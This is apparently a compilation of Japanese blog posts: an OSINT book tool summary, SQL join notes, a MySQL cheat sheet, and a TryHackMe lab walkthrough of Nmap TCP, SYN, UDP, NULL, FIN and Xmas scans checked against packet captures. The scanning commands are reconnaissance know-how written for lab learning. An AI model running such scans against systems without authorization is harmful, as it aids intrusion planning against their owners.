はじめに

「サイバー攻撃から企業システムを守る！　OSINT実践ガイド」を読んだので、2章で紹介されていたツールのまとめ。

1章 OSINTの基礎
2章 OSINT必携ツールの使い方
3章 OSINT情報の可視化
4章 グローバルでのOSINT活用事例

2章で紹介されていたツールまとめ

リンクが変わっていたり、廃止になっていたりしたので、後で見返しやすいように記録。
※2026年2月時点

1. 一部文面は「OSINT実践ガイド」より引用 ↩︎

その他

所要時間

1～4章までを23時間48分で読了。
各サービスを実際に利用したり、規約の確認をしたり、メモを取ったりしながらだと時間がかかる。

著作権について

本記事は「サイバー攻撃から企業システムを守る！ OSINT実践ガイド」を参考に、
紹介されているツールを整理したものです。

表中の「ユースケース」「サービス名」は書籍の目次構成に基づいています。
「用途」については書籍の表現を必要最小限の範囲で引用しています。
「備考」および「URL」は、2026年2月時点で筆者が確認・検証の上記載しています。

本記事は書籍の内容を代替するものではありません。

はじめに

SQLの勉強をしていて、外部結合をどんな時に使うのかイメージできなかったので調べてみた。

内部結合と外部結合の違い

内部結合（INNER JOIN）

両方のテーブルに 一致するデータがある行だけ 出す。
「関係が成立しているものだけ見たい」

外部結合（OUTER JOIN）

一致しない行も 欠けたまま（NULL）で出す。
「関係が成立していないものも把握したい」

”存在していない事実”を確認したいときが外部結合の出番。

サンプルデータを用意

シナリオ

登録だけして注文をしたことがない人を確認したい。

usersテーブル

登録ユーザーが記録されたテーブル。

ordersテーブル

注文履歴が記録されたテーブル。

外部結合でデータを抽出する

SQLで左外部結合

SELECT
  u.user_id, u.name,
  o.order_id, o.order_date, o.amount
FROM users u
LEFT OUTER JOIN orders o
  ON u.user_id = o.user_id
ORDER BY u.user_id, o.order_id;

結果

Suzukiさんは ordersテーブル に対応するデータがないため、注文していないことが分かる。

解説

左外部結合なので usersテーブル に ordersテーブル をくっつけている。
そのため、ordersテーブルに値がなくてもNULL表示される。
ordersテーブルの値がNULL = 注文をしたことがない人が分かる。

結論

外部結合は「ある／ない」を確認したいときに使える。

はじめに

自分用のSQL構文メモ。
MySQL用。

MySQLへのログイン

mysql -u ユーザー名 -p

データベース操作

データベース作成

CREATE DATABASE データベース名;

データベース削除

DROP DATABASE データベース名;

データベース一覧確認

SHOW DATABASES;

使用するデータベースの切り替え

USE データベース名;

現在使用中のデータベース確認

SELECT DATABASE();

テーブル操作

テーブル作成（基本）

CREATE TABLE テーブル名 (
フィールド名1 データ型,
フィールド名2 データ型
);

プライマリーキー・AUTO_INCREMENT付きテーブル作成

CREATE TABLE テーブル名 (
id INT AUTO_INCREMENT,
フィールド名 データ型,
PRIMARY KEY (id)
);

テーブル削除

DROP TABLE テーブル名;

テーブル一覧確認

SHOW TABLES;

テーブル定義確認

SHOW FIELDS FROM テーブル名;

フィールド（カラム）操作

フィールド追加

ALTER TABLE テーブル名 ADD 追加フィールド データ型 AFTER 既存フィールド;

フィールド削除

ALTER TABLE テーブル名 DROP 削除対象フィールド;

フィールド名変更

ALTER TABLE テーブル名 CHANGE 旧フィールド名 新フィールド名 データ型;

フィールドのデータ型変更

ALTER TABLE テーブル名 MODIFY フィールド名 データ型;

NOT NULL 制約の設定

ALTER TABLE テーブル名
MODIFY フィールド1 データ型 NOT NULL,
MODIFY フィールド2 データ型 NOT NULL;

デフォルト値の設定

ALTER TABLE テーブル名
ALTER フィールド名 SET DEFAULT 'デフォルト値';

プライマリーキー設定

ALTER TABLE テーブル名 ADD PRIMARY KEY (フィールド名);

外部キー制約設定

ALTER TABLE テーブル名
ADD FOREIGN KEY (外部キー列)
REFERENCES 参照先テーブル (主キー列);

ユーザー・権限管理

ユーザー作成

CREATE USER 'ユーザー名'@'localhost';

現在のユーザー確認

SELECT USER();

パスワード設定・変更

ALTER USER 'ユーザー名'@'localhost'
IDENTIFIED BY '新しいパスワード';

権限付与

GRANT 権限 ON データベース名.* TO 'ユーザー名'@'localhost';

主要権限一覧

データ操作

レコード追加

INSERT INTO テーブル名 (フィールド1, フィールド2)
VALUES ('データ1', 'データ2');

レコード追加（全カラム指定）

INSERT INTO テーブル名 VALUES ('データ1', 'データ2');

レコード更新

UPDATE テーブル名
SET 更新方法
WHERE 条件;

レコード削除

DELETE FROM テーブル名 WHERE 条件;

SELECT文（検索）

全件取得

SELECT * FROM テーブル名;

重複除外

SELECT DISTINCT フィールド名 FROM テーブル名;

条件付き検索

SELECT フィールド名
FROM テーブル名
WHERE フィールド名 比較演算子 '条件'
AND / OR / NOT フィールド名 比較演算子 '条件';

主要な比較演算子一覧

よく一緒に使う論理演算子

並び替え

SELECT フィールド名
FROM テーブル名
ORDER BY フィールド名 ASC / DESC;

件数制限

SELECT フィールド名
FROM テーブル名
ORDER BY フィールド名
LIMIT 件数;

集計・グループ化

GROUP BY + 集計関数

SELECT フィールド名, 集計関数
FROM テーブル名
GROUP BY フィールド名;

主要な集計関数一覧

別名（エイリアス）

SELECT フィールド名 AS 別名
FROM テーブル名;

JOIN（結合）

内部結合（INNER JOIN）

SELECT t1.フィールド, t2.フィールド
FROM テーブル1 AS t1
INNER JOIN テーブル2 AS t2
ON 条件

外部結合（LEFT / RIGHT JOIN）

SELECT t1.フィールド, t2.フィールド
FROM テーブル1 AS t1
LEFT / RIGHT OUTER JOIN テーブル2 AS t2
ON 条件;

完全外部結合（FULL OUTER JOIN）

MySQLでは FULL OUTER JOIN は未対応

SELECT t1.フィールド, t2.フィールド
FROM テーブル1 AS t1
FULL OUTER JOIN テーブル2 AS t2
ON 条件;

MySQLでの代替方法（UNION）

SELECT t1.フィールド, t2.フィールド
FROM テーブル1 AS t1
LEFT JOIN テーブル2 AS t2
ON 条件
UNION
SELECT t1.フィールド, t2.フィールド
FROM テーブル1 AS t1
RIGHT JOIN テーブル2 AS t2
ON 条件;

※ UNION は重複行を除外する。重複を許可したい場合は UNION ALL を使用する。
※ WHERE 句で結合先テーブルの条件を指定すると、外部結合の意味が失われることがあるため注意。

インデックス

インデックス作成

CREATE INDEX インデックス名 ON テーブル名 (フィールド名);

インデックス削除

DROP INDEX インデックス名 ON テーブル名;

インデックスの利用状況確認

EXPLAIN SELECT 文;

トランザクション

トランザクション開始

BEGIN;

確定

COMMIT;

取り消し

ROLLBACK;

SQLファイルの実行（データ展開）

SOURCE ファイルパス;

1. フィールド名 = フィールド名 + 1 など ↩︎
2. t1.フィールド = t2.フィールド など ↩︎

はじめに

Nmapで実際にポートスキャンをしてみた。
検証環境は TryHackMe の Nmap ルーム。

TryHackMe

Nmap An in depth look at scanning with Nmap, a powerful network scanning tool.

本記事の内容は教育目的のみに記載しています。実環境での悪用は犯罪行為です。必ず許可された演習環境でのみ実践してください。

TCPスキャン

使用頻度上位 100 ポートのみ（–top-ports 100）、スキャン中の詳細を表示（-vv）、pingをスキップ（-Pn）して
TCPスキャン（-sT）。

$ sudo nmap -sT --top-ports 100 -vv -Pn target ip

openポートを発見。

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-23 23:57 JST
Initiating Parallel DNS resolution of 1 host. at 23:57
Completed Parallel DNS resolution of 1 host. at 23:57, 0.00s elapsed
Initiating Connect Scan at 23:57
Scanning target ip [100 ports]
Discovered open port 3389/tcp on target ip
Discovered open port 135/tcp on target ip
Discovered open port 80/tcp on target ip
Discovered open port 21/tcp on target ip
Discovered open port 53/tcp on target ip
Completed Connect Scan at 23:57, 7.02s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set (0.37s latency).
Scanned at 2025-10-23 23:57:10 JST for 7s
Not shown: 95 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON
21/tcp   open  ftp           syn-ack
53/tcp   open  domain        syn-ack
80/tcp   open  http          syn-ack
135/tcp  open  msrpc         syn-ack
3389/tcp open  ms-wbt-server syn-ack

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.03 seconds

tshark でログを取っていたので確認してみる。

# tshark の結果を sT_result.txt へ出力
$ sudo tshark -i tun0 > sT_result.txt 
Running as user "root" and group "root". This could be dangerous.
Capturing on 'tun0'
237 ^C

# cat で全体のログを確認
$ cat sT_result.txt             
    1 0.000000000   host ip → target ip TCP 60 34450 → 111 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    2 0.000013296   host ip → target ip TCP 60 47774 → 113 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    3 0.000018708   host ip → target ip TCP 60 38474 → 135 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    4 0.000025294   host ip → target ip TCP 60 55670 → 5900 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    5 0.000030624   host ip → target ip TCP 60 46124 → 25 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    6 0.000035786   host ip → target ip TCP 60 59490 → 554 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    7 0.000041544   host ip → target ip TCP 60 38960 → 3306 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    8 0.000048233   host ip → target ip TCP 60 57882 → 110 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    9 0.000052118   host ip → target ip TCP 60 42396 → 3389 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
   10 0.000059820   host ip → target ip TCP 60 37896 → 8888 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
   11 0.377319586 target ip → host ip   TCP 52 135 → 38474 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   12 0.377390839   host ip → target ip TCP 40 38474 → 135 [ACK] Seq=1 Ack=1 Win=64256 Len=0
   13 0.378715797   host ip → target ip TCP 40 38474 → 135 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   14 0.378932212   host ip → target ip TCP 60 47616 → 23 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245775114 TSecr=0 WS=128
   15 0.378957703   host ip → target ip TCP 60 43838 → 995 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245775114 TSecr=0 WS=128
   16 1.027607473   host ip → target ip TCP 60 [TCP Retransmission] 37896 → 8888 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245775763 TSecr=0 WS=128
（省略）

ログを絞って確認。

# SYN 以外のログで絞ってみる
$ cat sT_result.txt | grep -v -F "[SYN]"
   11 0.377319586 target ip → host ip   TCP 52 135 → 38474 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   12 0.377390839   host ip → target ip TCP 40 38474 → 135 [ACK] Seq=1 Ack=1 Win=64256 Len=0
   13 0.378715797   host ip → target ip TCP 40 38474 → 135 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   28 2.268681269 target ip → host ip   TCP 52 135 → 38490 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   29 2.268724628   host ip → target ip TCP 40 38490 → 135 [ACK] Seq=1 Ack=1 Win=64256 Len=0
   30 2.268783378   host ip → target ip TCP 40 38490 → 135 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   61 3.272603426 target ip → host ip   TCP 52 21 → 43260 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   62 3.272698420   host ip → target ip TCP 40 43260 → 21 [ACK] Seq=1 Ack=1 Win=64256 Len=0
   63 3.273334678 target ip → host ip   TCP 52 53 → 58022 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   64 3.273357934   host ip → target ip TCP 40 58022 → 53 [ACK] Seq=1 Ack=1 Win=64256 Len=0
   65 3.273693028   host ip → target ip TCP 40 43260 → 21 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   66 3.274013386   host ip → target ip TCP 40 58022 → 53 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   77 3.274796974 target ip → host ip   TCP 52 80 → 49068 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   78 3.274865411   host ip → target ip TCP 40 49068 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0
   79 3.274951087   host ip → target ip TCP 40 49068 → 80 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   84 3.387604406 target ip → host ip   TCP 52 3389 → 42396 [SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288 WS=1 SACK_PERM
   85 3.387628199   host ip → target ip TCP 40 42396 → 3389 [RST] Seq=1 Win=0 Len=0
  150 4.998246831 target ip → host ip   TCP 52 135 → 38502 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
  151 4.998329872   host ip → target ip TCP 40 38502 → 135 [ACK] Seq=1 Ack=1 Win=64256 Len=0
  152 4.998587904   host ip → target ip TCP 40 38502 → 135 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
  232 6.277318520 target ip → host ip   TCP 52 3389 → 42398 [SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288 WS=1 SACK_PERM
  233 6.277337412   host ip → target ip TCP 40 42398 → 3389 [RST] Seq=1 Win=0 Len=0
  235 6.857444881 target ip → host ip   TCP 52 135 → 38504 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
  236 6.857524021   host ip → target ip TCP 40 38504 → 135 [ACK] Seq=1 Ack=1 Win=64256 Len=0
  237 6.858089282   host ip → target ip TCP 40 38504 → 135 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0

# SYN/ACK（open）で絞ってみる
$ cat sT_result.txt | grep -F "[SYN, ACK]"
   11 0.377319586 target ip → host ip   TCP 52 135 → 38474 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   28 2.268681269 target ip → host ip   TCP 52 135 → 38490 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   61 3.272603426 target ip → host ip   TCP 52 21 → 43260 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   63 3.273334678 target ip → host ip   TCP 52 53 → 58022 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   77 3.274796974 target ip → host ip   TCP 52 80 → 49068 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   84 3.387604406 target ip → host ip   TCP 52 3389 → 42396 [SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288 WS=1 SACK_PERM
  150 4.998246831 target ip → host ip   TCP 52 135 → 38502 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
  232 6.277318520 target ip → host ip   TCP 52 3389 → 42398 [SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288 WS=1 SACK_PERM
  235 6.857444881 target ip → host ip   TCP 52 135 → 38504 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM

# openポートの確認
$ cat sT_result.txt | grep -F "[SYN, ACK]" | awk '{print $8}' | sort -n -u
21
53
80
135
3389

SYN/ACK を返しているポートが open と判定されており、nmap のスキャン結果と tshark のログが一致していることが確認できた。

最後に、awk を使って TCP ハンドシェイク（SYN → SYN/ACK → ACK）が実際に成立しているかを確認してみる。

$ awk '    
  # 行中の「<num> → <num>」を1組だけ抜き出す
  match($0, /[[:space:]]([0-9]+)[[:space:]]*→[[:space:]]*([0-9]+)[[:space:]]/, m) {
    if (m[1]==21 || m[2]==21) print  
  }      
' sT_result.txt
   52 2.896504834   host ip → target ip TCP 60 43260 → 21 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245777632 TSecr=0 WS=128
   61 3.272603426 target ip → host ip   TCP 52 21 → 43260 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   62 3.272698420   host ip → target ip TCP 40 43260 → 21 [ACK] Seq=1 Ack=1 Win=64256 Len=0
   65 3.273693028   host ip → target ip TCP 40 43260 → 21 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0

TCP ハンドシェイクが成立していることが分かる。

SYNスキャン（ハーフオープンスキャン）

使用頻度上位 100 ポートのみ（–top-ports 100）、スキャン中の詳細を表示（-vv）、pingをスキップ（-Pn）して
SYNスキャン（-sS）。

$ sudo nmap -sS --top-ports 100 -vv -Pn target ip

openポートを発見。

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 13:06 JST
Initiating Parallel DNS resolution of 1 host. at 13:06
Completed Parallel DNS resolution of 1 host. at 13:06, 0.00s elapsed
Initiating SYN Stealth Scan at 13:06
Scanning target ip [100 ports]
Discovered open port 80/tcp on target ip
Discovered open port 21/tcp on target ip
Discovered open port 3389/tcp on target ip
Discovered open port 135/tcp on target ip
Discovered open port 53/tcp on target ip
Completed SYN Stealth Scan at 13:06, 6.14s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set (0.34s latency).
Scanned at 2025-10-26 13:06:36 JST for 7s
Not shown: 95 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON
21/tcp   open  ftp           syn-ack ttl 124
53/tcp   open  domain        syn-ack ttl 124
80/tcp   open  http          syn-ack ttl 124
135/tcp  open  msrpc         syn-ack ttl 124
3389/tcp open  ms-wbt-server syn-ack ttl 124

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.20 seconds
           Raw packets sent: 197 (8.668KB) | Rcvd: 7 (308B)

今度は pcap でログを取ってみる。

$ sudo tshark -i tun0 -w /tmp/Ss_result.pcap                                 
Running as user "root" and group "root". This could be dangerous.
Capturing on 'tun0'
211 ^C

# tshark で全体のログを確認
$ sudo tshark -r Ss_result.pcap                     
Running as user "root" and group "root". This could be dangerous.
    1 0.000000000   host ip → target ip TCP 44 63626 → 993 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    2 0.000010601   host ip → target ip TCP 44 63626 → 445 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    3 0.000011875   host ip → target ip TCP 44 63626 → 110 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    4 0.000012902   host ip → target ip TCP 44 63626 → 23 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    5 0.000013856   host ip → target ip TCP 44 63626 → 111 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    6 0.000014615   host ip → target ip TCP 44 63626 → 80 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    7 0.000015329   host ip → target ip TCP 44 63626 → 3389 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    8 0.000016047   host ip → target ip TCP 44 63626 → 113 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    9 0.000016757   host ip → target ip TCP 44 63626 → 21 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
   10 0.000017461   host ip → target ip TCP 44 63626 → 587 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
   11 0.338039856 target ip → host ip   TCP 44 80 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   12 0.338076236   host ip → target ip TCP 40 63626 → 80 [RST] Seq=1 Win=0 Len=0
   13 0.338747181 target ip → host ip   TCP 44 21 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   14 0.338809373   host ip → target ip TCP 40 63626 → 21 [RST] Seq=1 Win=0 Len=0
   15 0.339557912 target ip → host ip   TCP 44 3389 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288
   16 0.339571791   host ip → target ip TCP 40 63626 → 3389 [RST] Seq=1 Win=0 Len=0
(省略)

ログを絞って確認。

# SYN 以外のログで絞ってみる
$ sudo tshark -r sS_result.pcap -Y "not (tcp.flags.syn==1 && tcp.flags.ack==0)"
Running as user "root" and group "root". This could be dangerous.
   11 0.338039856 target ip8 → host ip   TCP 44 80 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   12 0.338076236   host ip → target ip8 TCP 40 63626 → 80 [RST] Seq=1 Win=0 Len=0
   13 0.338747181 target ip8 → host ip   TCP 44 21 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   14 0.338809373   host ip → target ip8 TCP 40 63626 → 21 [RST] Seq=1 Win=0 Len=0
   15 0.339557912 target ip8 → host ip   TCP 44 3389 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288
   16 0.339571791   host ip → target ip8 TCP 40 63626 → 3389 [RST] Seq=1 Win=0 Len=0
   23 0.677269837 target ip8 → host ip   TCP 44 135 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   24 0.677332313   host ip → target ip8 TCP 40 63626 → 135 [RST] Seq=1 Win=0 Len=0
   55 3.165016037 target ip8 → host ip   TCP 44 53 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   56 3.165076706   host ip → target ip8 TCP 40 63626 → 53 [RST] Seq=1 Win=0 Len=0
   57 3.165703655 target ip8 → host ip   TCP 44 80 → 63631 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   58 3.165753573   host ip → target ip8 TCP 40 63631 → 80 [RST] Seq=1 Win=0 Len=0
  173 4.863356730 target ip8 → host ip   TCP 44 80 → 63633 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
  174 4.863426175   host ip → target ip8 TCP 40 63633 → 80 [RST] Seq=1 Win=0 Len=0

# SYN/ACK（open）で絞ってみる
$ sudo tshark -r sS_result.pcap -Y "tcp.flags.syn==1 && tcp.flags.ack==1"
Running as user "root" and group "root". This could be dangerous.
   11 0.338039856 target ip8 → host ip   TCP 44 80 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   13 0.338747181 target ip8 → host ip   TCP 44 21 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   15 0.339557912 target ip8 → host ip   TCP 44 3389 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288
   23 0.677269837 target ip8 → host ip   TCP 44 135 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   55 3.165016037 target ip8 → host ip   TCP 44 53 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   57 3.165703655 target ip8 → host ip   TCP 44 80 → 63631 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
  173 4.863356730 target ip8 → host ip   TCP 44 80 → 63633 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288

# openポートの確認
$ sudo tshark -r sS_result.pcap -Y "tcp.flags.syn==1 && tcp.flags.ack==1" -T fields -e tcp.srcport | sort -n -u
Running as user "root" and group "root". This could be dangerous.
21
53
80
135
3389

SYN/ACK を返しているポートが open になっているので、nmap の結果と tshark のログは一致している。

ハーフオープンスキャン（SYN→SYN/ACK→RST）を本当にしているか確認してみる。

$ sudo tshark -r sS_result.pcap -Y "tcp.port == 21"                            
Running as user "root" and group "root". This could be dangerous.
    9 0.000016757   host ip → target ip TCP 44 63626 → 21 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
   13 0.338747181 target ip → host ip   TCP 44 21 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   14 0.338809373   host ip → target ip TCP 40 63626 → 21 [RST] Seq=1 Win=0 Len=0

SYN/ACK に対して RST で切断しているため、ハーフオープンスキャンの挙動。

UDPスキャン

使用頻度上位 100 ポートのみ（–top-ports 100）、スキャン中の詳細を表示（-vv）、pingをスキップ（-Pn）して
UDPスキャン（-sU）。

$ sudo nmap -sU --top-ports 100 -vv -Pn target ip

openポートを発見。

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 14:03 JST
Initiating Parallel DNS resolution of 1 host. at 14:03
Completed Parallel DNS resolution of 1 host. at 14:03, 0.00s elapsed
Initiating UDP Scan at 14:03
Scanning target ip [100 ports]
Discovered open port 53/udp on target ip
Completed UDP Scan at 14:03, 12.09s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set (0.36s latency).
Scanned at 2025-10-26 14:03:17 JST for 11s
Not shown: 99 open|filtered udp ports (no-response)
PORT   STATE SERVICE REASON
53/udp open  domain  udp-response ttl 124

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds
           Raw packets sent: 261 (16.044KB) | Rcvd: 4 (262B)

pcap でログを取ってみる。

$ sudo tshark -i tun0 -w /tmp/sU_result.pcap                                            
Running as user "root" and group "root". This could be dangerous.
Capturing on 'tun0'
273 ^C

今回は Wireshar でログを確認してみる。

$ sudo wireshark sU_result.pcap  

ip.src == target ip で応答のあったものだけ絞る。

ip.src == target ip && not icmp

DNS のみ表示されたので、nmap の結果と一致。

特殊スキャン（NULL／FIN／Xmas）

検証環境でopenポートが見つからなかったので、今回はフラグだけ確認。

NULLスキャン

# NULLスキャン
$ sudo nmap -sN --top-ports 100 -vv -Pn target ip

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 14:57 JST
Initiating Parallel DNS resolution of 1 host. at 14:57
Completed Parallel DNS resolution of 1 host. at 14:57, 0.00s elapsed
Initiating NULL Scan at 14:57
Scanning target ip [100 ports]
Completed NULL Scan at 14:57, 21.11s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set.
Scanned at 2025-10-26 14:57:12 JST for 22s
All 100 scanned ports on target ip are in ignored states.
Not shown: 100 open|filtered tcp ports (no-response)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 21.15 seconds
           Raw packets sent: 200 (8.000KB) | Rcvd: 0 (0B)

フラグはすべて0。

FINスキャン

# FINスキャン
$ sudo nmap -sF --top-ports 100 -vv -Pn target ip

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 14:52 JST
Initiating Parallel DNS resolution of 1 host. at 14:52
Completed Parallel DNS resolution of 1 host. at 14:52, 0.00s elapsed
Initiating FIN Scan at 14:52
Scanning target ip [100 ports]
Completed FIN Scan at 14:52, 21.09s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set.
Scanned at 2025-10-26 14:52:08 JST for 21s
All 100 scanned ports on target ip are in ignored states.
Not shown: 100 open|filtered tcp ports (no-response)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 21.18 seconds
           Raw packets sent: 200 (8.000KB) | Rcvd: 0 (0B)

FIN = 1。

Xmasスキャン

# Xmasスキャン
$ sudo nmap -sX --top-ports 100 -vv -Pn target ip

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 14:52 JST
Initiating Parallel DNS resolution of 1 host. at 14:52
Completed Parallel DNS resolution of 1 host. at 14:52, 0.01s elapsed
Initiating XMAS Scan at 14:52
Scanning target ip [100 ports]
Completed XMAS Scan at 14:53, 21.09s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set.
Scanned at 2025-10-26 14:52:53 JST for 21s
All 100 scanned ports on target ip are in ignored states.
Not shown: 100 open|filtered tcp ports (no-response)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 21.16 seconds
           Raw packets sent: 200 (8.000KB) | Rcvd: 0 (0B)

FIN = 1、PSH = 1、URG = 1。

おまけ

UDPスキャンでホストIPとターゲットIP以外に 239.255.255.250（SSDP¹用マルチキャストアドレス）への通信を発見。

nmapはスキャン中に「このネットワーク内にUPnP²デバイスがいるか？」を自動的にチェックすることがあり、その時にこの宛先へ M-SEARCH * HTTP/1.1 パケットを送信するそう。

1. 家庭内ネットワークなどで機器同士が自動的に見つけ合うための通信プロトコル。UPnPの一部として定義されており、主にUDPの1900番ポートを使う。 ↩︎
2. Universal Plug and Play。家庭やオフィス内のネットワーク機器が自動的に見つけ合い、設定なしで通信できるようにする仕組み。 ↩︎

Nmapとは

Nmap（Network Mapper）は、ネットワーク上の機器やサービスを調べるための最もポピュラーなツール。IPアドレスの“生死確認（ホストが生きているか）”から、どのポートでどんなサービスが動いているか、さらに一部の脆弱性の有無まで発見できる。

スキャンの種類

実際にスキャンを実行した記事はこちら。

セキュリティエンジニアの雑多ブロ…

Nmapでポートスキャンをしてみる | セキュリティエンジニアの雑多ブログ はじめに Nmapで実際にポートスキャンをしてみた。検証環境は TryHackMe の Nmap ルーム。 本記事の内容は教育目的のみに記載しています。実環境での悪用は犯罪行為です。…

TCPスキャン

何をするか：TCP接続（SYN→SYN/ACK→ACK）を完了させる。
